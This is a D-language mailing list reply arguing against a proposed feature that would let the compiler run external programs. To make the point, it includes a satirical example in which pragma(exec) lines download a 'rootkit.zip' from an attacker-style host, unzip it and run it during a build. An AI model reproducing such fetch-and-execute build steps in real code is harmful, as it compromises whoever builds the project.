Compile time executable calling?
H. S. Teoh
hsteoh at quickfur.ath.cx
Wed Jan 8 12:32:51 PST 2014
On Wed, Jan 08, 2014 at 06:56:26PM +0000, Tofu Ninja wrote:
> On Wednesday, 8 January 2014 at 18:50:04 UTC, Orvid King wrote:
> >On Wednesday, 8 January 2014 at 18:46:37 UTC, Tofu Ninja wrote:
> >>I made a post about it a few months back and it seemed like
> >>there were some people who would want this, but nothing ever
> >>came of it.
> >>
> >>The idea is basically being able to call and capture the output
> >>of a program at compile time, similar to a string import.
> >>
> >>Has anyone thought about this since?
> >>
> >>I know I for one would still love this.
> >>
> >>-Tofu
> >
> >My argument against this is simple, and can be summed up in one
> >sentence: "Why yes, you tried to build my code, so I deleted all
> >of your source code."
>
> I think something like this would have a compile flag to enable it
> for security. I don't think I would be too worried about it.
I'm already trembling in my shoes at the sound of it. Hands up, those
among you who download the source code for some project online and
manually type 'dmd src/mod1.d src/mod2.d src/mod3.d src/main.d' (rather
than, say, 'make' or whatever it is you kids use nowadays).
Nobody? Hmm... I could've sworn such people still existed...
OK, take #2. Hands up, those of you who read the makefile / build script
of some online project to see what it does, before you run it.
Still nobody? Really? So you're saying that you'd just download some
source code from some random website (or fork some project on github,
same difference), and then you'll just blindly run the build script
without looking to see what it does? Like this?:
# wget http://s00per.hax0r.net/projects/hackme.zip
# unzip hackme.zip
# cd hackme
# ./configure
... [snip whole bunch of garbage]
# make install
...
dmd -allow-exec main.d [oops, what just happened?]
...
# cat main.d
module main;
...
pragma(exec, "wget http://blackhat.com/rootkit.zip");
pragma(exec, "unzip rootkit.zip");
pragma(exec, "./rootkit");
...
# [Uh oh...]
T
--
The two rules of success: 1. Don't tell everything you know. -- YHL
More information about the Digitalmars-d
mailing list